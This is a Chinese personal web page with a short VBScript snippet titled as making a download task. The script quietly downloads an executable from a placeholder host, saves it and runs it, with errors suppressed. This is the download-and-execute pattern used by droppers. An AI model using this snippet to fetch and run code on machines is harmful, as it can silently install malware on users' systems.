设为首页
收藏本站
本站论坛
   
3
3
   
  文章列表      

vbs 制作下载任务

posturl="http://xxxxx/Maxthon.exe"
fileto="Maxthon.exe"
On Error Resume Next
Set Post=CreateObject("Microsoft.XMLHTTP")
Set Shell=CreateObject("Wscript.Shell")
Post.Open "get", posturl,0
Post.Send()
Set aGet=CreateObject("ADODB.Stream")
aGet.Mode=3
aGet.Type=1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile fileto,2
Shell.Run(fileto)


> >
 
 
   
 
网上赚钱申请指南
 

友情链接
个人主页
 
 
 
 

wel come to . 欢迎光临
宇宙浪仔